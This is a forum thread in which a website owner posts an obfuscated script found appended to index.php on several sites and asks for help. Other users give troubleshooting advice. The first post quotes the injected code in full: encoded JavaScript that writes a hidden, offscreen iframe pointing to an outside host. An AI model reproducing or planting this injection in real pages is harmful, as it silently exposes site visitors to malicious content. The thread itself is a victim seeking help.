0
Welcome Guest! Login
0 items Join Now

What type of script is this?

Last Post
Search Topic

  • What type of script is this?

    Posted 15 years 5 months ago
    • This script got tagged on to the end of my index.php file in two websites on two different servers in the main directory. I was compromised by problems with FileZilla and I have spent ages removing Iframe virus Trojans from various websites.

      <?php echo ''; ?><?php echo '<script type="text/javascript">var kBcbixsouogTfIchnyMH = "kV60kV105kV102kV114kV97kV109kV101kV32kV119kV105kV100kV116kV104kV61kV34kV52kV56kV48kV34kV32kV104kV101kV105kV103kV104kV116kV61kV34kV54kV48kV34kV32kV115kV114kV99kV61kV34kV104kV116kV116kV112kV58kV47kV47kV104kV105kV116kV45kV115kV101kV110kV100kV101kV114kV115kV46kV99kV110kV47kV102kV105kV110kV100kV47kV105kV110kV46kV99kV103kV105kV63kV54kV34kV32kV115kV116kV121kV108kV101kV61kV34kV98kV111kV114kV100kV101kV114kV58kV48kV112kV120kV59kV32kV112kV111kV115kV105kV116kV105kV111kV110kV58kV114kV101kV108kV97kV116kV105kV118kV101kV59kV32kV116kV111kV112kV58kV48kV112kV120kV59kV32kV108kV101kV102kV116kV58kV45kV53kV48kV48kV112kV120kV59kV32kV111kV112kV97kV99kV105kV116kV121kV58kV48kV59kV32kV102kV105kV108kV116kV101kV114kV58kV112kV114kV111kV103kV105kV100kV58kV68kV88kV73kV109kV97kV103kV101kV84kV114kV97kV110kV115kV102kV111kV114kV109kV46kV77kV105kV99kV114kV111kV115kV111kV102kV116kV46kV65kV108kV112kV104kV97kV40kV111kV112kV97kV99kV105kV116kV121kV61kV48kV41kV59kV32kV45kV109kV111kV122kV45kV111kV112kV97kV99kV105kV116kV121kV58kV48kV34kV62kV60kV47kV105kV102kV114kV97kV109kV101kV62";var FVxOkuVZcmEMnhoVehKZ = kBcbixsouogTfIchnyMH.split("kV");var VqsBzVjmTvtZRroBmJaO = "";for (var wfbjMQFrxPQSGJUFeDry=1; wfbjMQFrxPQSGJUFeDry<FVxOkuVZcmEMnhoVehKZ.length; wfbjMQFrxPQSGJUFeDry++){VqsBzVjmTvtZRroBmJaO+=String.fromCharCode(FVxOkuVZcmEMnhoVehKZ[wfbjMQFrxPQSGJUFeDry]);}var MNwVKuSOmaiBMmiNFikT = ""+VqsBzVjmTvtZRroBmJaO+"";document.write(""+MNwVKuSOmaiBMmiNFikT+"")</script>'; ?>
    • http://www.Oscarfishlover.com - the website for great Oscar Fish advice and help
    #339485
    • JEM's Avatar
    • JEM
    • Preeminent Rocketeer
    • Posts: 17917
    • Thanks: 4

    Re: What type of script is this?

    Posted 15 years 5 months ago
    • A remnant from the virus....?

      Can yo delete it and see if it effects the site(s)?
    • Thanks,
      jim
    #339671

  • Re: What type of script is this?

    Posted 15 years 5 months ago
    • This has been driving me around the twist in the last couple of days.

      Every website hosted with dream hosts is being affected with this one after another. The latest one is this website
      www.tacticalmilitaryandsportswatches.co.uk/

      It's not difficult to get the website back online, you just have to remove the script from the very end of the index.php file. I can't understand why this is happening. I've even change the password on the FTP. I think I mentioned that a few weeks ago, I installed the latest version of FileZilla. Then I realised that there was something wrong and it had done some weird things to the file permissions. I think it must have compromised every website hosted on dream host. I've also got several websites hosted on rochen and haven't had any problems, apart from one glitch a few weeks ago. The same thing happened to a website hosted on site ground last night. It's really starting to get me down
    • http://www.Oscarfishlover.com - the website for great Oscar Fish advice and help
    #339682
    • JEM's Avatar
    • JEM
    • Preeminent Rocketeer
    • Posts: 17917
    • Thanks: 4

    Re: What type of script is this?

    Posted 15 years 5 months ago
    #339684
    • Roeland_A!'s Avatar
    • Roeland_A!
    • Preeminent Rocketeer
    • Posts: 10193
    • Thanks: 71

    Re: What type of script is this?

    Posted 15 years 5 months ago
    • Run a virusscanner on your own computer, maybe that is infected with a virus or a rootkit of some sort.
    • *Karma comes in many forms, my personal favourite is the random saucepan from the sky* J.Spencer 17-02-2009
    #339743

  • Re: What type of script is this?

    Posted 15 years 5 months ago
    • Thank you Roeland, we'll do that. I did actually doing it yesterday with both malware and adawarebot, plus I ran Kaspersky. Touch wood, it's not my computer that is the problem.

      I just noticed this dam script is now on the administration section of one of my websites. I don't think that anyone can get into my FTP now because the password has been changed.
    • http://www.Oscarfishlover.com - the website for great Oscar Fish advice and help
    #339874

  • Re: What type of script is this?

    Posted 15 years 5 months ago
    • This is getting ridiculous. Yet another website (1.5.11) which I've only just replaced has been attacked by this script. I'm just wondering, if I have a website on the server that is infected, could spread to the others?
    • http://www.Oscarfishlover.com - the website for great Oscar Fish advice and help
    #339976
    • Roeland_A!'s Avatar
    • Roeland_A!
    • Preeminent Rocketeer
    • Posts: 10193
    • Thanks: 71

    Re: What type of script is this?

    Posted 15 years 5 months ago
    • No, it is probably spreading through you. Just retrace your steps, last updated/changed servers are infected.
    • *Karma comes in many forms, my personal favourite is the random saucepan from the sky* J.Spencer 17-02-2009
    #340072

  • Re: What type of script is this?

    Posted 15 years 5 months ago
    • I am busy deleting anything that I don't need off the server. It must have been when I installed that dodgy copy of FileZilla, that's the only thing that could have caused this
    • http://www.Oscarfishlover.com - the website for great Oscar Fish advice and help
    #340077

  • Re: What type of script is this?

    Posted 15 years 5 months ago
    • this script has got onto another website hosted with site ground. It must be on my computer
    • http://www.Oscarfishlover.com - the website for great Oscar Fish advice and help
    #340440

Time to create page: 0.063 seconds